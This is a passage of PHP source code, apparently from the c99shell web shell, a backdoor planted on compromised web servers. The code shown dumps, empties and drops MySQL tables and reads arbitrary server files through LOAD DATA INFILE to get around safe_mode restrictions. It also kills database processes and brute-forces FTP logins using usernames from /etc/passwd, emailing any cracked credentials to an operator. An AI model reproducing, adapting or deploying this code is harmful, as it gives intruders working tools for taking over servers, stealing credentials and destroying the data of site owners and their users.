1069      echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>"; 
1070      echo "<b>DB:</b>&nbsp;<input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>"; 
1071      $v = join (";",$dmptbls); 
1072      echo "<b>Only tables (explode \";\")&nbsp;<b><sup>1</sup></b>:</b>&nbsp;<input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>"; 
1073      if ($dump_file) {$tmp = $dump_file;} 
1074      else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");} 
1075      echo "<b>File:</b>&nbsp;<input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>"; 
1076      echo "<b>Download: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>"; 
1077      echo "<b>Save to file: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>"; 
1078      echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty"; 
1079      echo "</form>"; 
1080     } 
1081     else 
1082     { 
1083      $diplay = TRUE; 
1084      $set = array(); 
1085      $set["sock"] = $sql_sock; 
1086      $set["db"] = $sql_db; 
1087      $dump_out = "download"; 
1088      $set["print"] = 0; 
1089      $set["nl2br"] = 0; 
1090      $set[""] = 0; 
1091      $set["file"] = $dump_file; 
1092      $set["add_drop"] = TRUE; 
1093      $set["onlytabs"] = array(); 
1094      if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);} 
1095      $ret = mysql_dump($set); 
1096      if ($sql_dump_download) 
1097      { 
1098       @ob_clean(); 
1099       header("Content-type: application/octet-stream"); 
1100       header("Content-length: ".strlen($ret)); 
1101       header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";"); 
1102       echo $ret; 
1103       exit; 
1104      } 
1105      elseif ($sql_dump_savetofile) 
1106      { 
1107       $fp = fopen($sql_dump_file,"w"); 
1108       if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";} 
1109       else 
1110       { 
1111        fwrite($fp,$ret); 
1112        fclose($fp); 
1113        echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>."; 
1114       } 
1115      } 
1116      else {echo "<b>Dump: nothing to do!</b>";} 
1117     } 
1118    } 
1119    if ($diplay) 
1120    { 
1121     if (!empty($sql_tbl)) 
1122     { 
1123      if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";} 
1124      $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;"); 
1125      $count_row = mysql_fetch_array($count); 
1126      mysql_free_result($count); 
1127      $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;"); 
1128      $tbl_struct_fields = array(); 
1129      while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;} 
1130      if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;} 
1131      if (empty($sql_tbl_page)) {$sql_tbl_page = 0;} 
1132      if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;} 
1133      if (empty($sql_tbl_le)) {$sql_tbl_le = 30;} 
1134      $perpage = $sql_tbl_le - $sql_tbl_ls; 
1135      if (!is_numeric($perpage)) {$perpage = 10;} 
1136      $numpages = $count_row[0]/$perpage; 
1137      $e = explode(" ",$sql_order); 
1138      if (count($e) == 2) 
1139      { 
1140       if ($e[0] == "d") {$asc_desc = "DESC";} 
1141       else {$asc_desc = "ASC";} 
1142       $v = "ORDER BY `".$e[1]."` ".$asc_desc." "; 
1143      } 
1144      else {$v = "";} 
1145      $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage.""; 
1146      $result = mysql_query($query) or print(mysql_smarterror()); 
1147      echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>"; 
1148      echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[&nbsp;<b>Structure</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; 
1149      echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[&nbsp;<b>Browse</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; 
1150      echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[&nbsp;<b>Dump</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; 
1151      echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[&nbsp;<b>Insert</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; 
1152      if ($sql_tbl_act == "structure") {echo "<br><br><b>Coming sooon!</b>";} 
1153      if ($sql_tbl_act == "insert") 
1154      { 
1155       if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();} 
1156       if (!empty($sql_tbl_insert_radio)) 
1157       { 
1158       } 
1159       else 
1160       { 
1161        echo "<br><br><b>Inserting row into table:</b><br>"; 
1162        if (!empty($sql_tbl_insert_q)) 
1163        { 
1164         $sql_query = "SELECT * FROM `".$sql_tbl."`"; 
1165         $sql_query .= " WHERE".$sql_tbl_insert_q; 
1166         $sql_query .= " LIMIT 1;"; 
1167         $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror()); 
1168         $values = mysql_fetch_assoc($result); 
1169         mysql_free_result($result); 
1170        } 
1171        else {$values = array();} 
1172        echo "<form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>"; 
1173        foreach ($tbl_struct_fields as $field) 
1174        { 
1175         $name = $field["Field"]; 
1176         if (empty($sql_tbl_insert_q)) {$v = "";} 
1177         echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>"; 
1178         $i++; 
1179        } 
1180        echo "</table><br>"; 
1181        echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>"; 
1182        if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";} 
1183        echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>"; 
1184       } 
1185      } 
1186      if ($sql_tbl_act == "browse") 
1187      { 
1188       $sql_tbl_ls = abs($sql_tbl_ls); 
1189       $sql_tbl_le = abs($sql_tbl_le); 
1190       echo "<hr size=\"1\" noshade>"; 
1191       echo "<img src=\"".$surl."act=img&img=multipage\" height=\"12\" width=\"10\" alt=\"Pages\">&nbsp;"; 
1192       $b = 0; 
1193       for($i=0;$i<$numpages;$i++) 
1194       { 
1195        if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";} 
1196        echo $i; 
1197        if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";} 
1198        if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";} 
1199        else {echo "&nbsp;";} 
1200       } 
1201       if ($i == 0) {echo "empty";} 
1202       echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\">&nbsp;<input type=\"submit\" value=\"View\"></form>"; 
1203       echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1>"; 
1204       echo "<tr>"; 
1205       echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>"; 
1206       for ($i=0;$i<mysql_num_fields($result);$i++) 
1207       { 
1208        $v = mysql_field_name($result,$i); 
1209        if ($e[0] == "a") {$s = "d"; $m = "asc";} 
1210        else {$s = "a"; $m = "desc";} 
1211        echo "<td>"; 
1212        if (empty($e[0])) {$e[0] = "a";} 
1213        if ($e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";} 
1214        else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\"><img src=\"".$surl."act=img&img=sort_".$m."\" height=\"9\" width=\"14\" alt=\"".$m."\"></a>";} 
1215        echo "</td>"; 
1216       } 
1217       echo "<td><font color=\"green\"><b>Action</b></font></td>"; 
1218       echo "</tr>"; 
1219       while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) 
1220       { 
1221        echo "<tr>"; 
1222        $w = ""; 
1223        $i = 0; 
1224        foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;} 
1225        if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);} 
1226        echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>"; 
1227        $i = 0; 
1228        foreach ($row as $k=>$v) 
1229        { 
1230         $v = htmlspecialchars($v); 
1231         if ($v == "") {$v = "<font color=\"green\">NULL</font>";} 
1232         echo "<td>".$v."</td>"; 
1233         $i++; 
1234        } 
1235        echo "<td>"; 
1236        echo "<a href=\"".$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Delete\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;"; 
1237        echo "<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\"><img src=\"".$surl."act=img&img=change\" alt=\"Edit\" height=\"14\" width=\"14\" border=\"0\"></a>&nbsp;"; 
1238        echo "</td>"; 
1239        echo "</tr>"; 
1240       } 
1241       mysql_free_result($result); 
1242       echo "</table><hr size=\"1\" noshade><p align=\"left\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">"; 
1243       echo "<option value=\"\">With selected:</option>"; 
1244       echo "<option value=\"deleterow\">Delete</option>"; 
1245       echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>"; 
1246      } 
1247     } 
1248     else 
1249     { 
1250      $result = mysql_query("SHOW TABLE STATUS", $sql_sock); 
1251      if (!$result) {echo mysql_smarterror();} 
1252      else 
1253      { 
1254       echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>"; 
1255       $i = 0; 
1256       $tsize = $trows = 0; 
1257       while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) 
1258       { 
1259        $tsize += $row["Data_length"]; 
1260        $trows += $row["Rows"]; 
1261        $size = view_size($row["Data_length"]); 
1262        echo "<tr>"; 
1263        echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>"; 
1264        echo "<td>&nbsp;<a href=\"".$sql_surl."sql_tbl=".urlencode($row["Name"])."\"><b>".$row["Name"]."</b></a>&nbsp;</td>"; 
1265        echo "<td>".$row["Rows"]."</td>"; 
1266        echo "<td>".$row["Type"]."</td>"; 
1267        echo "<td>".$row["Create_time"]."</td>"; 
1268        echo "<td>".$row["Update_time"]."</td>"; 
1269        echo "<td>".$size."</td>"; 
1270        echo "<td>&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_empty\" alt=\"Empty\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Drop\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".$row["Name"]."\"><img src=\"".$surl."act=img&img=sql_button_insert\" alt=\"Insert\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;</td>"; 
1271        echo "</tr>"; 
1272        $i++; 
1273       } 
1274       echo "<tr bgcolor=\"000000\">"; 
1275       echo "<td><center><b>»</b></center></td>"; 
1276       echo "<td><center><b>".$i." table(s)</b></center></td>"; 
1277       echo "<td><b>".$trows."</b></td>"; 
1278       echo "<td>".$row[1]."</td>"; 
1279       echo "<td>".$row[10]."</td>"; 
1280       echo "<td>".$row[11]."</td>"; 
1281       echo "<td><b>".view_size($tsize)."</b></td>"; 
1282       echo "<td></td>"; 
1283       echo "</tr>"; 
1284       echo "</table><hr size=\"1\" noshade><p align=\"right\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">"; 
1285       echo "<option value=\"\">With selected:</option>"; 
1286       echo "<option value=\"tbldrop\">Drop</option>"; 
1287       echo "<option value=\"tblempty\">Empty</option>"; 
1288       echo "<option value=\"tbldump\">Dump</option>"; 
1289       echo "<option value=\"tblcheck\">Check table</option>"; 
1290       echo "<option value=\"tbloptimize\">Optimize table</option>"; 
1291       echo "<option value=\"tblrepair\">Repair table</option>"; 
1292       echo "<option value=\"tblanalyze\">Analyze table</option>"; 
1293       echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>"; 
1294       mysql_free_result($result); 
1295      } 
1296     } 
1297    } 
1298    } 
1299   } 
1300   else 
1301   { 
1302    $acts = array("","newdb","serverstatus","servervars","processes","getfile"); 
1303    if (in_array($sql_act,$acts)) {?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php } 
1304    if (!empty($sql_act)) 
1305    { 
1306     echo "<hr size=\"1\" noshade>"; 
1307     if ($sql_act == "newdb") 
1308     { 
1309      echo "<b>"; 
1310      if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";} 
1311      else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();} 
1312     } 
1313     if ($sql_act == "serverstatus") 
1314     { 
1315      $result = mysql_query("SHOW STATUS", $sql_sock); 
1316      echo "<center><b>Server-status variables:</b><br><br>"; 
1317      echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>"; 
1318      while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} 
1319      echo "</table></center>"; 
1320      mysql_free_result($result); 
1321     } 
1322     if ($sql_act == "servervars") 
1323     { 
1324      $result = mysql_query("SHOW VARIABLES", $sql_sock); 
1325      echo "<center><b>Server variables:</b><br><br>"; 
1326      echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>"; 
1327      while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} 
1328      echo "</table>"; 
1329      mysql_free_result($result); 
1330     } 
1331     if ($sql_act == "processes") 
1332     { 
1333 
1334      if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";} 
1335      $result = mysql_query("SHOW PROCESSLIST", $sql_sock); 
1336      echo "<center><b>Processes:</b><br><br>"; 
1337      echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#333333 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>"; 
1338      while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";} 
1339      echo "</table>"; 
1340      mysql_free_result($result); 
1341     } 
1342     if ($sql_act == "getfile") 
1343     { 
1344      $tmpdb = $sql_login."_tmpdb"; 
1345      $select = mysql_select_db($tmpdb); 
1346      if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;} 
1347      if ($select) 
1348      { 
1349       $created = FALSE; 
1350       mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );"); 
1351       mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); 
1352       $result = mysql_query("SELECT * FROM tmp_file;"); 
1353       if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";} 
1354       else 
1355       { 
1356        for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);} 
1357        $f = ""; 
1358        while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);} 
1359        if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";} 
1360        else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";} 
1361        mysql_free_result($result); 
1362        mysql_query("DROP TABLE tmp_file;"); 
1363       } 
1364      } 
1365      mysql_drop_db($tmpdb); //comment it if you want to leave database 
1366     } 
1367    } 
1368   } 
1369 } 
1370 echo "</td></tr></table>"; 
1371 if ($sql_sock) 
1372 { 
1373   $affected = @mysql_affected_rows($sql_sock); 
1374   if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;} 
1375   echo "<tr><td><center><b>Affected rows: ".$affected."</center></td></tr>"; 
1376 } 
1377 echo "</table>"; 
1378 } 
1379 if ($act == "mkdir") 
1380 { 
1381 if ($mkdir != $d) 
1382 { 
1383   if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";} 
1384   elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";} 
1385   echo "<br><br>"; 
1386 } 
1387 $act = $dspact = "ls"; 
1388 } 
1389 if ($act == "ftpquickbrute") 
1390 { 
1391 echo "<b>Ftp Quick brute:</b><br>"; 
1392 if (!win) {echo "This functions not work in Windows!<br><br>";} 
1393 else 
1394 { 
1395   function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh) 
1396   { 
1397    if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));} 
1398    else {$TRUE = TRUE;} 
1399    if ($TRUE) 
1400    { 
1401     $sock = @ftp_connect($host,$port,$timeout); 
1402     if (@ftp_login($sock,$login,$pass)) 
1403     { 
1404      echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>"; 
1405      ob_flush(); 
1406      return TRUE; 
1407     } 
1408    } 
1409   } 
1410   if (!empty($submit)) 
1411   { 
1412    if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;} 
1413    $fp = fopen("/etc/passwd","r"); 
1414    if (!$fp) {echo "Can't get /etc/passwd for password-list.";} 
1415    else 
1416    { 
1417     if ($fqb_logging) 
1418     { 
1419      if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");} 
1420      else {$fqb_logfp = FALSE;} 
1421      $fqb_log = "FTP Quick Brute (called c99shell v. ".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n"; 
1422      if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} 
1423     } 
1424     ob_flush(); 
1425     $i = $success = 0; 
1426     $ftpquick_st = getmicrotime(); 
1427     while(!feof($fp)) 
1428     { 
1429      $str = explode(":",fgets($fp,2048)); 
1430      if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh)) 
1431      { 
1432       echo "<b>Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"</b><br>"; 
1433       $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n"; 
1434       if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} 
1435       $success++; 
1436       ob_flush(); 
1437      } 
1438      if ($i > $fqb_lenght) {break;} 
1439      $i++; 
1440     } 
1441     if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";} 
1442     $ftpquick_t = round(getmicrotime()-$ftpquick_st,4); 
1443     echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=green><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br>Connects per second: ".round($i/$ftpquick_t,2)."<br>"; 
1444     $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n"; 
1445     if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} 
1446     if ($fqb_logemail) {@mail($fqb_logemail,"c99shell v. ".$shver." report",$fqb_log);} 
1447     fclose($fqb_logfp); 
1448    } 
1449   } 
1450   else 
1451   { 
1452    $logfile = $tmpdir_logs."c99sh_ftpquickbrute_".date("d.m.Y_H_i_s").".log"; 
1453    $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile); 
1454    echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"ftpquickbrute\"><br>Read first: <input type=text name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"><br><br>Users only with shell?&nbsp;<input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br>Logging?&nbsp;<input type=\"checkbox\" name=\"fqb_logging\" value=\"1\" checked><br>Logging to file?&nbsp;<input type=\"text\" name=\"fqb_logfile\" value=\"".$logfile."\" size=\"".(strlen($logfile)+2*(strlen($logfile)/10))."\"><br>Logging to e-mail?&nbsp;<input type=\"text\" name=\"fqb_logemail\" value=\"".$log_email."\" size=\"".(strlen($logemail)+2*(strlen($logemail)/10))."\"><br><br><input type=submit name=submit value=\"Brute\"></form>"; 
1455   } 
1456 } 
1457 } 
1458 if ($act == "d") 
1459 { 
1460 if (!is_dir($d)) {echo "<center><b>Permision denied!</b></center>";} 
1461 else 
1462 { 
1463   echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>"; 
1464   if (!$win) 
1465   { 
1466    echo "<tr><td><b>Owner/Group</b></td><td> "; 
1467    $ow = posix_getpwuid(fileowner($d)); 
1468    $gr = posix_getgrgid(filegroup($d)); 
1469    $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d)); 
1470   } 
1471   echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table><br>"; 
1472 } 
1473 } 
1474 if ($act == "phpinfo") {@ob_clean(); phpinfo(); c99shexit();} 
1475 if ($act == "security") 
1476 { 
1477 echo "<center><b>Server security information:</b></center><b>Open base dir: ".$hopenbasedir."</b><br>"; 
1478 if (!$win) 
1479 { 
1480   if ($nixpasswd) 
1481   { 
1482    if ($nixpasswd == 1) {$nixpasswd = 0;} 
1483    echo "<b>*nix /etc/passwd:</b><br>"; 
1484    if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;} 
1485    if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;} 
